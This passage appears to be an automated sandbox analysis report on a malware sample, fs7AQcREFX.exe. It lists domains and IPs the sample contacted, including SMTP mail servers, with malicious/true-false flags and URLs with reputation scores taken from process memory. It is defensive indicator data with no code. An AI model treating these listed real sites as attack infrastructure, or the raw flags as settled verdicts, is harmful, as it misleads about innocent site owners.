                      http://www.pcgrate.com0%Avira URL Cloudsafe
                      http://www.mobilnic.net/c0%Avira URL Cloudsafe
                      http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.3.0%Avira URL Cloudsafe
                      http://www.pb-games.com/e0%Avira URL Cloudsafe
                      http://www.pb-games.com/s0%Avira URL Cloudsafe
                      http://umcor.am/0%Avira URL Cloudsafe
                      https://www.naoi-a.com/0%Avira URL Cloudsafe
                      http://www.vexcom.com/m0%Avira URL Cloudsafe
                      http://pohlfood.com/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.20%Avira URL Cloudsafe
                      http://www.jenco.co.uk/x0%Avira URL Cloudsafe
                      http://arowines.com/0%Avira URL Cloudsafe
                      http://shanks.co.uk/0%Avira URL Cloudsafe
                      http://www.vexcom.com/B0%Avira URL Cloudsafe
                      https://dataform.co.uk/wp-signup.php?new=magicomm.co.uk0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      holp-ai.com
                      59.106.13.169
                      truetrue
                        unknown
                        webways.com
                        188.114.97.7
                        truetrue
                          unknown
                          impexnc.com
                          204.11.56.48
                          truetrue
                            unknown
                            www.fcwcvt.org
                            188.114.96.7
                            truetrue
                              unknown
                              dayvo.com
                              188.114.96.7
                              truetrue
                                unknown
                                hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
                                3.130.204.160
                                truefalse
                                  high
                                  enguita.net
                                  195.5.116.23
                                  truetrue
                                    unknown
                                    dataform.co.uk
                                    83.223.113.46
                                    truetrue
                                      unknown
                                      shteeble.com
                                      185.106.129.180
                                      truefalse
                                        unknown
                                        evcpa.com
                                        192.124.249.10
                                        truefalse
                                          unknown
                                          kallman.net
                                          185.76.64.25
                                          truetrue
                                            unknown
                                            shittas.com
                                            43.246.117.171
                                            truetrue
                                              unknown
                                              bible.org
                                              104.20.55.214
                                              truefalse
                                                high
                                                gphpedit.org
                                                127.0.0.1
                                                truetrue
                                                  unknown
                                                  missnue.com
                                                  104.21.234.121
                                                  truefalse
                                                    unknown
                                                    jsaps.com
                                                    49.212.235.59
                                                    truefalse
                                                      unknown
                                                      avse.hu
                                                      185.129.138.60
                                                      truetrue
                                                        unknown
                                                        pohlfood.com
                                                        104.218.10.254
                                                        truefalse
                                                          unknown
                                                          notis.ru
                                                          185.178.208.141
                                                          truetrue
                                                            unknown
                                                            canasil.com
                                                            104.26.2.14
                                                            truetrue
                                                              unknown
                                                              www.jenco.co.uk
                                                              104.21.23.9
                                                              truetrue
                                                                unknown
                                                                www.tyrns.com
                                                                62.75.216.137
                                                                truefalse
                                                                  unknown
                                                                  willsub.com
                                                                  69.89.107.122
                                                                  truefalse
                                                                    high
                                                                    nts-web.net
                                                                    49.212.235.175
                                                                    truetrue
                                                                      unknown
                                                                      shesfit.com
                                                                      188.114.97.7
                                                                      truetrue
                                                                        unknown
                                                                        ldh.la.gov
                                                                        75.2.95.235
                                                                        truefalse
                                                                          high
                                                                          www.vexcom.com
                                                                          104.21.55.224
                                                                          truetrue
                                                                            unknown
                                                                            cpmteam.com
                                                                            188.114.97.7
                                                                            truefalse
                                                                              high
                                                                              tcpoa.com
                                                                              159.89.244.183
                                                                              truetrue
                                                                                unknown
                                                                                kevyt.net
                                                                                172.67.129.18
                                                                                truetrue
                                                                                  unknown
                                                                                  www.mobilnic.net
                                                                                  154.203.14.100
                                                                                  truefalse
                                                                                    unknown
                                                                                    s5w.com
                                                                                    192.99.226.184
                                                                                    truetrue
                                                                                      unknown
                                                                                      www.sclover3.com
                                                                                      157.112.182.239
                                                                                      truefalse
                                                                                        unknown
                                                                                        in1.smtp.messagingengine.com
                                                                                        103.168.172.217
                                                                                        truetrue
                                                                                          unknown
                                                                                          paraski.org
                                                                                          94.130.164.242
                                                                                          truetrue
                                                                                            unknown
                                                                                            dog-jog.net
                                                                                            153.122.24.177
                                                                                            truetrue
                                                                                              unknown
                                                                                              kamptal.at
                                                                                              128.204.134.138
                                                                                              truetrue
                                                                                                unknown
                                                                                                bd-style.com
                                                                                                103.112.69.92
                                                                                                truetrue
                                                                                                  unknown
                                                                                                  ora.ecnet.jp
                                                                                                  60.43.154.138
                                                                                                  truefalse
                                                                                                    high
                                                                                                    adventist.ro
                                                                                                    49.12.155.123
                                                                                                    truefalse
                                                                                                      unknown
                                                                                                      www.edimart.hu
                                                                                                      81.2.194.241
                                                                                                      truefalse
                                                                                                        unknown
                                                                                                        zupraha.cz
                                                                                                        77.78.104.3
                                                                                                        truetrue
                                                                                                          unknown
                                                                                                          isom.org
                                                                                                          192.124.249.14
                                                                                                          truetrue
                                                                                                            unknown
                                                                                                            any-s.net
                                                                                                            108.170.12.50
                                                                                                            truetrue
                                                                                                              unknown
                                                                                                              muhr-soehne.de
                                                                                                              5.189.171.125
                                                                                                              truetrue
                                                                                                                unknown
                                                                                                                www.railbook.net
                                                                                                                103.224.212.221
                                                                                                                truetrue
                                                                                                                  unknown
                                                                                                                  hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com
                                                                                                                  54.161.222.85
                                                                                                                  truefalse
                                                                                                                    high
                                                                                                                    oaith.ca
                                                                                                                    192.124.249.12
                                                                                                                    truetrue
                                                                                                                      unknown
                                                                                                                      shztm.ru
                                                                                                                      62.122.170.171
                                                                                                                      truetrue
                                                                                                                        unknown
                                                                                                                        www.abdg.com
                                                                                                                        192.252.154.18
                                                                                                                        truetrue
                                                                                                                          unknown
                                                                                                                          www.spanesi.com
                                                                                                                          5.196.166.214
                                                                                                                          truefalse
                                                                                                                            unknown
                                                                                                                            aiolos-sa.gr
                                                                                                                            188.114.97.7
                                                                                                                            truetrue
                                                                                                                              unknown
                                                                                                                              usadig.com
                                                                                                                              198.100.146.220
                                                                                                                              truetrue
                                                                                                                                unknown
                                                                                                                                metaforacom.com
                                                                                                                                185.42.105.162
                                                                                                                                truetrue
                                                                                                                                  unknown
                                                                                                                                  dhh.la.gov
                                                                                                                                  52.200.51.73
                                                                                                                                  truefalse
                                                                                                                                    high
                                                                                                                                    gmail-smtp-in.l.google.com
                                                                                                                                    142.250.153.27
                                                                                                                                    truefalse
                                                                                                                                      high
                                                                                                                                      fdlymca.org
                                                                                                                                      192.124.249.9
                                                                                                                                      truetrue
                                                                                                                                        unknown
                                                                                                                                        assideum.com
                                                                                                                                        52.219.100.91
                                                                                                                                        truetrue
                                                                                                                                          unknown
                                                                                                                                          smtp1.sbc.mail.am0.yahoodns.net
                                                                                                                                          66.163.170.48
                                                                                                                                          truefalse
                                                                                                                                            unknown
                                                                                                                                            bidroll.com
                                                                                                                                            13.56.33.8
                                                                                                                                            truetrue
                                                                                                                                              unknown
                                                                                                                                              cbras.com
                                                                                                                                              54.39.198.18
                                                                                                                                              truetrue
                                                                                                                                                unknown
                                                                                                                                                atbauk.org
                                                                                                                                                104.21.92.170
                                                                                                                                                truetrue
                                                                                                                                                  unknown
                                                                                                                                                  www.vazir.se
                                                                                                                                                  206.191.152.37
                                                                                                                                                  truefalse
                                                                                                                                                    unknown
                                                                                                                                                    www.naoi-a.com
                                                                                                                                                    202.254.236.40
                                                                                                                                                    truefalse
                                                                                                                                                      unknown
                                                                                                                                                      d2r2uj0bnofxxz.cloudfront.net
                                                                                                                                                      99.84.88.20
                                                                                                                                                      truefalse
                                                                                                                                                        high
                                                                                                                                                        www.valselit.com
                                                                                                                                                        193.70.68.254
                                                                                                                                                        truetrue
                                                                                                                                                          unknown
                                                                                                                                                          vvsteknik.dk
                                                                                                                                                          185.31.76.90
                                                                                                                                                          truefalse
                                                                                                                                                            unknown
                                                                                                                                                            biosolve.com
                                                                                                                                                            151.101.130.159
                                                                                                                                                            truetrue
                                                                                                                                                              unknown
                                                                                                                                                              karmy.com.pl
                                                                                                                                                              185.253.212.22
                                                                                                                                                              truetrue
                                                                                                                                                                unknown
                                                                                                                                                                www.fe-bauer.de
                                                                                                                                                                3.65.101.129
                                                                                                                                                                truefalse
                                                                                                                                                                  unknown
                                                                                                                                                                  smtp.mail.global.gm0.yahoodns.net
                                                                                                                                                                  87.248.97.36
                                                                                                                                                                  truetrue
                                                                                                                                                                    unknown
                                                                                                                                                                    vdoherty.com
                                                                                                                                                                    91.216.241.100
                                                                                                                                                                    truefalse
                                                                                                                                                                      unknown
                                                                                                                                                                      hbfuels.com
                                                                                                                                                                      85.233.160.146
                                                                                                                                                                      truetrue
                                                                                                                                                                        unknown
                                                                                                                                                                        pb-games.com
                                                                                                                                                                        173.254.28.29
                                                                                                                                                                        truefalse
                                                                                                                                                                          unknown
                                                                                                                                                                          mackusick.de
                                                                                                                                                                          217.160.0.131
                                                                                                                                                                          truetrue
                                                                                                                                                                            unknown
                                                                                                                                                                            ncn.de
                                                                                                                                                                            46.30.60.158
                                                                                                                                                                            truetrue
                                                                                                                                                                              unknown
                                                                                                                                                                              nekono.net
                                                                                                                                                                              202.172.28.187
                                                                                                                                                                              truetrue
                                                                                                                                                                                unknown
                                                                                                                                                                                fnw.us
                                                                                                                                                                                137.118.26.67
                                                                                                                                                                                truefalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  komie.com
                                                                                                                                                                                  59.106.13.181
                                                                                                                                                                                  truetrue
                                                                                                                                                                                    unknown
                                                                                                                                                                                    ftmobile.com
                                                                                                                                                                                    199.34.228.78
                                                                                                                                                                                    truetrue
                                                                                                                                                                                      unknown
                                                                                                                                                                                      www.x0c.com
                                                                                                                                                                                      185.53.177.50
                                                                                                                                                                                      truefalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        onzcda.com
                                                                                                                                                                                        35.186.238.101
                                                                                                                                                                                        truefalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          sledsport.ru
                                                                                                                                                                                          185.22.232.175
                                                                                                                                                                                          truetrue
                                                                                                                                                                                            unknown
                                                                                                                                                                                            www.findbc.com
                                                                                                                                                                                            13.248.169.48
                                                                                                                                                                                            truetrue
                                                                                                                                                                                              unknown
                                                                                                                                                                                              tbvlugus.nl
                                                                                                                                                                                              174.129.25.170
                                                                                                                                                                                              truefalse
                                                                                                                                                                                                high
                                                                                                                                                                                                pellys.co.uk
                                                                                                                                                                                                77.72.4.226
                                                                                                                                                                                                truetrue
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  cubodown.com
                                                                                                                                                                                                  104.21.30.14
                                                                                                                                                                                                  truetrue
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    infotech.pl
                                                                                                                                                                                                    79.96.32.254
                                                                                                                                                                                                    truefalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      semuk.com
                                                                                                                                                                                                      86.105.245.69
                                                                                                                                                                                                      truefalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        tozzhin.com
                                                                                                                                                                                                        202.94.166.30
                                                                                                                                                                                                        truetrue
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          tabbles.net
                                                                                                                                                                                                          80.211.41.39
                                                                                                                                                                                                          truefalse
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            cqdgroup.com
                                                                                                                                                                                                            221.132.33.88
                                                                                                                                                                                                            truetrue
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              fortknox.bm
                                                                                                                                                                                                              216.177.137.32
                                                                                                                                                                                                              truetrue
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                camamat.com
                                                                                                                                                                                                                104.21.235.31
                                                                                                                                                                                                                truetrue
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  ikulani.com
                                                                                                                                                                                                                  157.7.107.88
                                                                                                                                                                                                                  truetrue
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    lyto.net
                                                                                                                                                                                                                    188.114.97.7
                                                                                                                                                                                                                    truetrue
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      cjborden.com
                                                                                                                                                                                                                      15.197.142.173
                                                                                                                                                                                                                      truetrue
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        alexpope.biz
                                                                                                                                                                                                                        76.74.184.61
                                                                                                                                                                                                                        truetrue
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          fundeo.com
                                                                                                                                                                                                                          104.24.161.27
                                                                                                                                                                                                                          truetrue
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            waldi.pl
                                                                                                                                                                                                                            46.242.238.60
                                                                                                                                                                                                                            truefalse
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                              http://skypearl.com/true
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://a-domani.com/true
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://fdlymca.org/true
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://univi.it/true
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://likangds.com/true
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://www.elpro.si/false
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://www.credo.edu.pl/false
                                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://sigtoa.com/true
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://dhh.la.gov/false
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                http://www.naoi-a.com/false
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://www.abdg.com/false
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://hes.pt/true
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                https://ldh.la.gov/false
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  http://calvinly.com/false
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  http://www.ora-ito.com/false
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  http://umcor.am/true
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  http://shanks.co.uk/true
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  http://arowines.com/true
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  https://dataform.co.uk/wp-signup.php?new=magicomm.co.uktrue
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                                  http://www.ora-ito.com/~-fs7AQcREFX.exe, 00000000.00000003.504000964.00000000061B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  https://www.com-sit.com/usa/fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    http://www.owsports.ca//Ffs7AQcREFX.exe, 00000000.00000003.393651051.0000000006187000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://www.dgmna.com/zfs7AQcREFX.exe, 00000000.00000003.626513177.00000000061B8000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504000964.00000000061B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    https://www.medius.si/fs7AQcREFX.exe, 00000000.00000002.731356544.00000000061D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://www.stnic.co.uk/g17fs7AQcREFX.exe, 00000000.00000003.630648067.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wcfs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    https://pohlfood.com/#websitefs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    https://www.pcgrate.com/#webpagefs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://pohlfood.com/wp-content/themes/hello-elementor/style.min.css?ver=2.7.1fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    https://inhouse.pohlfood.com/fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://pohlfood.com/wp-content/plugins/ooohboi-steroids-for-elementor/assets/css/main.css?ver=2.1.50fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://www.abdg.com/$fs7AQcREFX.exe, 00000000.00000003.504000964.0000000006187000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://www.myropcb.com/wp-content/themes/thematic/library/scripts/supersubs.jsfs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    https://www.alantron.com/turkce/destek/search.tofs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://www.hummer.hu/oKfs7AQcREFX.exe, 00000000.00000003.617704098.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.562867147.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.625818550.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.568147378.0000000000AF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://www.com-sit.com/wp-content/uploads/premium-addons-elementor/pa-frontend-2947ecb72.min.css?verfs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      high
